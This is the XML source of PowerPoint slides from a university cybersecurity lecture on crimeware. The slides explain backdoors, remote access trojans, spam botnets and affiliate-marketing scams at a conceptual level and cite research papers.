              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2785924E-91AC-4BAF-8EC0-95A635C4F3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BE94BA-0DD4-4BD0-9E7E-FB9D3D77A014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2177708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6CFA8-F335-4C5E-8BF6-3FAE6EF6FD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9B28FE-36F7-49B2-9D2D-DE83A25290A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{385BEAEA-5E8E-4276-9C7D-D10371377C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1DE4D-3A48-40B6-BAFD-3B4FB27C8972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3654990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8A0F51-95A5-4FCC-82A0-2139FD138A35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66AD572-A4E5-4A12-9F20-194D39D771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E346D9-0163-4200-A4EE-11B98DB0E2D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2860304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83CFA-4715-47A7-973F-EFB58A31B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B42C8D-E0CC-46C1-ACAD-A0395A5E5B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A0E468-3718-443E-94CA-CA298A5E9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091E15-5481-4DB8-8EFB-2BFE045580AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00554D76-C060-45CB-B4CE-B4750622B0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F409D0-8B5D-40AD-B3E7-3575DD480F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716512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D4F1C-AFD2-4854-8BAF-D66B0FE060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90EEA3-03B2-49E6-AFC7-ABE6ADBD3D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31EF05-A83A-4390-9CA8-38FB8F025C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381983-662E-43EF-919D-E2F886A7DB35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9FD016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12262B47-2305-4167-A2B4-A1E9F9E29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F1D3F-1EFB-4BE3-B7B4-4068951D1369}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C2E29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344156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95138A-9205-480F-918D-8830B5B31B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D910A8-2268-432C-A7E3-169770BB6D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F253F-9C7E-4AF9-87C1-27A2C3D66C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016BB-603F-4E45-BB71-7B2EA0E63EC5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/22/2020</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C51941E-7DAD-42EE-9F71-2294DF2600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E829B3-E83D-40A2-99A0-3C2582DDB6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29D2F-E88C-4723-B280-B694997C3522}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2235679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0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hyperlink" Target="http://www.canadianpharma.com/"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hyperlink" Target="http://www.canadianpharma.com/"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s://people.eecs.berkeley.edu/~pearce/papers/rats_oakland_2017.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/7583/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.ucsb.edu/~vigna/publications/2011_stone_cova_gilbert_kemmerer_kruegel_vigna_torpig.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.ucsb.edu/~vigna/publications/2009_stone-gross_cova_cavallaro_gilbert_szydlowski_kemmerer_kruegel_vigna_Torpig.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~savage/papers/CCS12Exploit.pdf" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide145.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~savage/papers/UsenixSec12.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://krebsonsecurity.com/2014/06/peek-inside-a-professional-carding-shop/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~savage/papers/Oakland11.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.icir.org/vern/papers/miscreant-wealth.ccs07.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~savage/papers/LEET09.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~savage/papers/CCS08Conversion.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~voelker/pubs/forums-imc11.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.ucsb.edu/~vigna/publications/2011_stone_abman_kemmerer_kruegel_steigerwald_vigna_FakeAV.pdf"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cseweb.ucsd.edu/~voelker/pubs/za-ccs14.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.inwyrd.com/blog/wp-content/uploads/2014/08/ccs2014dialing.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~savage/papers/CCS12Priceless.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cs.ucsb.edu/~gangw/twitter_imc13.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cseweb.ucsd.edu/~savage/papers/UsenixSec11-DJ.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ccs.neu.edu/home/cbw/pdf/crowdturfing-www12.pdf"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image" Target="../media/image25.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/></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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/></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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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F059-9FC4-4E45-BA28-BEB48EFF1A10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CY 2550 Foundations of Cybersecurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9BF3AAA-9F53-441D-8DA2-CEF9EA940552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crimeware, and all that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>it entails</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1794076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19760-F493-46EE-886C-1F2CB19003FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Backdoors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4CB7E7-D9C6-49AA-9AAA-6DAFDE0DBA85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825624"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware that opens a secret entry point into a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many possible implementations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a specific user account with a predefined password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable guest access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn-on existing remote admin functionality (e.g. remote desktop, telnet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open a listening port and wait for commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trojan + backdoor = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote Access Trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common tools used by spies and stalkers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1897E371-5587-4540-8F38-20034778D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51618">
            <a:off x="8522455" y="4151785"/>
            <a:ext cx="2459493" cy="2459493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224731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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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On the Origins of Spam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is estimated that &gt;90% of all email sent each day is spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hundreds of billions of spam messages per day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spammers are key players in the cybercrime underground</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build, curate, buy, and sell lists of email addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send mail on behalf of other actors for a fee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pay Per Install services looking to acquire traffic and infections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishers looking to steal personal information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spammers rent access to botnets to send bulk email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need many IP addresses to circumvent spam filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23692066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Affiliate Marketing</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Huge amounts of spam are related to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>affiliate marketing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>schemes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scammers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> set up websites selling illegal/counterfeit goods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pharma: Viagra, Cialis, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vicoden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Knockoffs: Rolex, Gucci, Louis Vuitton, Nike, Microsoft, Adobe, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake Anti-Virus: “Warning, your computer is infected! Pay $49.99…”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scammers are responsible for delivering products and collecting payments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we will see, access to credit card processing infrastructure is crucial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many scams have legitimate customer service departments!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spammers sign-up as “affiliates” with scam campaigns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spammers advertise the scams, and collect commission on successful sales</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commission is typically 30-50% of the final sale price</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305062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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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3" dur="500" fill="hold"/>
